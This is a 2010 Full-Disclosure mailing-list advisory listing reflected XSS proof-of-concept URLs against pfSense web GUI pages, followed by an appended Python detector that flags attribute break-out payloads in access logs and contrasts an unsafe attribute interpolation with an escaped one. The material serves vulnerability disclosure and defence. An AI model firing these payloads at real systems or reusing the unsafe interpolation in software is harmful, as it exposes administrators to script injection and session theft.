[Full-disclosure] pfsense xss issues.
- To: full-disclosure <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] pfsense xss issues.
- From: dave b <db.pub.mail@xxxxxxxxx>
- Date: Sat, 6 Nov 2010 15:08:32 +1100
"Those who cannot learn from history are doomed to repeat it." - George Santayana
http://cvstrac.pfsense.org/chngview?cn=20994
"Comment: Make scripts XSS input safe. "
Date: 2008-Feb-11 23:33:24 (local) 2008-Feb-12 04:33:24 (UTC)
So in 2010, pfsense 2 beta 4:
...
xss -> pkg_edit.php
https://10.0.20.220/pkg_edit.php?xml=olsrd.xml&id=%22/%3E%3Cscript%3Ealert%282%29;%3C/script%3E
xss -> pkg.php
https://10.0.20.220/pkg.php?xml=jailctl.xm%27l%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
...
-----------
in pfsense 2 beta 4:
xss -> status_graph.php
https://10.0.20.220/status_graph.php?if=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
xss -> interfaces.php
https://10.0.20.220/interfaces.php?if=wan%22%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
-------------
And in pfsense (stable and 2 beta 4):
http://10.0.20.222/graph.php?ifnum=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&ifname=
or
http://10.0.20.222/graph.php?ifnum=&ifname=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
--
question = ( to ) ? be : ! be; -- Wm. Shakespeare
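As an added defender-side example, not part of dave b's post or of pfSense's own code: a Python script that percent-decodes the query strings of requests like the ones above and flags parameter values carrying HTML tag syntax or the `"/>` attribute break-out used in every URL here, beside the unsafe attribute interpolation and the entity-encoded form that neutralizes it. The access-log lines, the `render_if_attr_*` helpers and the assumption that the fix is equivalent to PHP's `htmlspecialchars($v, ENT_QUOTES)` are constructed for this example, not taken from the page.

```python
import html
import re
from urllib.parse import urlsplit, parse_qsl

# The pattern in the advisory: a quoted attribute is closed with "/> and a
# <script> element is appended.  A '<' opening a tag, or a '"' followed by
# an attribute-closing sequence, inside a query value is suspicious.
TAG_OR_BREAKOUT = re.compile(r'<\s*/?\s*[a-zA-Z]|"\s*/?\s*>')

def suspicious_params(url):
    """Return {param: decoded_value} for query parameters whose decoded
    value contains tag syntax or an attribute break-out sequence."""
    parts = urlsplit(url)
    # parse_qsl percent-decodes, so %3Cscript%3E becomes <script>
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    return {k: v for k, v in pairs if TAG_OR_BREAKOUT.search(v)}

def render_if_attr_unsafe(ifname):
    # Vulnerable pattern (constructed): the parameter is interpolated verbatim
    # into a quoted attribute, so "/><script> breaks out of the attribute.
    return '<input name="if" value="%s"/>' % ifname

def render_if_attr_safe(ifname):
    # Hardened form: entity-encode &, <, >, " and ' before emitting the value
    # inside a quoted attribute (assumed equivalent to PHP's
    # htmlspecialchars($v, ENT_QUOTES) in a pfSense PHP page).
    return '<input name="if" value="%s"/>' % html.escape(ifname, quote=True)

# Constructed sample of webGUI access-log entries: two request URLs from the
# advisory plus one benign request.
SAMPLE_LOG = """\
10.0.20.5 - - [06/Nov/2010:15:01:02 +1100] "GET /interfaces.php?if=wan HTTP/1.1" 200 5120
10.0.20.5 - - [06/Nov/2010:15:01:09 +1100] "GET /status_graph.php?if=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E HTTP/1.1" 200 4096
10.0.20.5 - - [06/Nov/2010:15:01:15 +1100] "GET /graph.php?ifnum=&ifname=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def scan_log(text):
    """Return (request_path, {param: value}) for each log line whose query
    string carries a suspicious value."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        bad = suspicious_params(m.group(1))
        if bad:
            hits.append((m.group(1).split("?", 1)[0], bad))
    return hits
```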
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/